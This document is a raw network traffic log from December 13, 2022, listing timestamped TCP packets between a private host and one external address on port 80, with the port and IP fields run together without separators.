                                              Dec 13, 2022 20:09:18.357660055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.357660055 CET804974862.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.357749939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.357788086 CET4974880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.357871056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.357979059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358072042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358172894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358247995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358344078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358436108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358496904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.358524084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358664036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.358664989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358685017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.358716011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358804941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358894110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.358975887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.359075069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.359164000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.359250069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.359353065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.359440088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.360084057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.360160112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.360646009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.361141920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.361161947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.361438990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.361499071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.361685038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.361687899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.361738920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.361830950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.361915112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362000942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362096071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362185955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362277031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362373114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362477064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362566948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362654924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362749100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362842083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.362930059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364188910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364299059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364459991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364584923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364681959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364765882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364860058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.364944935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365036964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365125895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365214109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365305901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365397930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365483046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365571022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365660906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365753889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365839958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.365936041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366022110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366112947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366204023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366295099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366383076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.366482973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367016077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367150068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367254972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367374897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367464066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367561102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367649078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367739916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367829084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.367925882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.368009090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.368104935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.373766899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.373929977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.373965979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.374166012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378037930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378104925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378501892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378568888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378603935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378642082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378810883 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.378899097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379003048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379185915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379287958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379498959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379718065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.379842043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.380170107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.380256891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.380551100 CET804974962.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.380790949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.380918980 CET4974980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.381042004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381131887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381191969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381280899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381345987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381419897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381475925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.381911039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382000923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382076025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382133007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382198095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382349014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382426977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382498026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382575035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382654905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.382710934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.383016109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.383089066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.383156061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.386249065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.386310101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.386343002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.386377096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.386990070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.387023926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.387056112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.387087107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.387314081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.387389898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388165951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388197899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388227940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388259888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388289928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388319969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388351917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388384104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388413906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388443947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388494968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388906002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388946056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.388978004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389058113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389128923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389422894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389461994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389549971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389806986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389839888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.389925003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390280962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390320063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390379906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390410900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390583992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.390871048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391036987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391064882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391130924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391221046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391246080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391586065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391746998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391773939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391798973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.391942978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.392013073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.392041922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.392092943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.392318010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.397543907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.397631884 CET4974980192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.397692919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.397831917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.397922039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.398017883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.398097038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.398199081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.398281097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.401537895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.401726007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.401829004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.401932955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402019978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402112961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402199984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402292967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402379990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402472019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402556896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402645111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.402647972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402673960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.402698040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.402767897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402853012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402904034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.402947903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.402992010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403014898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403043032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403068066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403135061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403188944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403266907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403285027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403405905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403414965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403523922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403548002 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403620958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403624058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403723955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403841019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403882980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403915882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.403954029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.403995991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404019117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404057980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404140949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404179096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404267073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404287100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404385090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404392958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404443026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404488087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404607058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404633999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404670954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404751062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404753923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404829979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.404851913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.404978991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405013084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405018091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405042887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405139923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405149937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405174017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405236959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405337095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405380011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405422926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405539989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.405560970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405586004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405608892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405756950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405781031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405869961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.405946016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.406033993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.406119108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.406275988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408268929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408293962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408473015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408545971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408581018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408723116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408797979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408828020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.408869028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.408970118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.408979893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.409065962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409116030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.409167051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409265041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409353971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409445047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409490108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.409517050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.409553051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409579039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.409679890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409789085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409876108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.409966946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410135984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410154104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410228968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410324097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410408020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410506010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410588026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410680056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410787106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410873890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.410968065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411050081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411144018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411227942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411319971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411411047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411499977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411591053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411676884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411871910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411890030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.411993027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412085056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412185907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412266970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412368059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412452936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412548065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412635088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412728071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412812948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412906885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.412997007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413084030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413177967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413263083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413356066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413696051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.413795948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.414138079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.414237976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.415116072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.415184021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.415569067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.415585995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.415821075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416302919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416340113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416373968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416414976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416454077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416496992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416537046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416574955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416620016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416637897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416654110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416738987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416815996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.416939974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.417146921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.417259932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.417304039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.417319059 CET804973662.204.41.79192.168.2.3
